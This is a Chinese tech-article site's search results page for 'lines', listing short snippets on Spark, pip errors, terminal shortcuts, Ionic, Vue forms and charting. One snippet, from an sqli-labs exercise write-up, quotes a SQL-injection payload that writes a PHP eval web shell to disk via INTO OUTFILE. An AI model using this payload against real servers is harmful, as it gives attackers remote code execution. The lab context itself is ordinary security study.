码迷,mamicode.com
首页 >  
搜索关键字:lines    ( 2570个结果
实验4 RDD编程初级实践
1.spark-shell交互式编程 (1) 该系总共有多少学生 scala> val lines = sc.textFile("file:///usr/local/spark/sparklab/Data01.txt") lines: org.apache.spark.rdd.RDD[String] ...
分类:其他好文   时间:2020-02-07 22:19:06    阅读次数:182
pip安装ujson报错: error:Microsoft Visual C++ 14.0 is required
在win10上pip安装ujson报错 之前一直用的是mac本,但由于疫情问题,最近不得不用win10系统来进行python开发,在使用pip安装依赖包ujson时,遇到了问题,如下: 问题很明显:Microsoft Visual C++ 9.0 is required。意思是缺少编译ujson的C ...
分类:编程语言   时间:2020-02-07 13:12:17    阅读次数:289
Spark-shell交互式编程
1.该系总共有多少学生 val lines = sc.textFile("file:///usr/local/spark/sparksqldata/Data01.txt") val par = lines.map(row=>row.split(",")(0)) val distinct_par = ...
分类:系统相关   时间:2020-02-06 22:44:07    阅读次数:106
mac item2自定义光标移动快捷键,移动行首行尾,按单词跳转
To jump between words and start/end of lines in iTerm2 follow these steps: iTerm2 -> Preferences (? + ,) Open the “Keys” tab Add the following Global ...
分类:移动开发   时间:2020-02-06 12:47:35    阅读次数:92
ionic4 无限滚动加载组件 ion-infinite-scroll-content 的loadingSpinner 属性
按官方文档 https://ionicframework.com/docs/api/infinite-scroll-content loadingSpinner有如下可选值: bubbles circles circular crescent dots lines(默认) lines-small ...
分类:其他好文   时间:2020-02-06 12:30:41    阅读次数:94
通过cmd修改注册表(设置cmd窗口的大小)
通过cmd修改注册表(设置cmd窗口的大小) 设置cmd的窗口 mode: modem设置系统设备,主要是lpt1, com1/2, con:启动时设置窗口大小: cmd /k "mode con: cols=120 lines=40"或 cmd /k "mode 120,40"经典的尺寸是wh=1 ...
分类:其他好文   时间:2020-02-05 13:16:08    阅读次数:293
sqli-labs less46-53
lines terminated by xxx 以xxx为结尾:select '<?php @eval($_ POST[crow]);?>' into outfile 'C:\pbpstudy\PHPTutorilWWW.crow.pbp’ linesterminated by 0x363636;最 ...
分类:数据库   时间:2020-02-03 22:49:41    阅读次数:110
HDU1029 简单DP
"OK, you are not too bad, em... But you can never pass the next test." feng5166 says. "I will tell you an odd number N, and then N integers. There wil ...
分类:其他好文   时间:2020-02-02 13:45:34    阅读次数:51
表单绑定的基本用法
下面的代码实现的有:单行文本、多行文本、复选框(checkbox)、单选按钮(radio)、选择框(selected) 1 <!DOCTYPE html> 2 <html> 3 <head> 4 <meta charset="utf-8"> 5 <title></title> 6 <script s ...
分类:其他好文   时间:2020-02-02 01:44:10    阅读次数:112
LightningChartJS网页图表代码示例--Lineseries线性图
下面的代码给出了lightningchart JS一个基本线性图的使用范例。线性图在笛卡尔坐标上绘制,表现两个变量之间的关系。直线段连接成数据点,线性图将信息作为这些数据点显示出来。一般用来显示数据变化或展示数据集的趋势。 此类型的图不包含可视的数据点“标记”,仅包含所有数据点之间的连续连接线。 此 ...
分类:Web程序   时间:2020-01-29 21:58:29    阅读次数:105
2570条   上一页 1 ... 17 18 19 20 21 ... 257 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!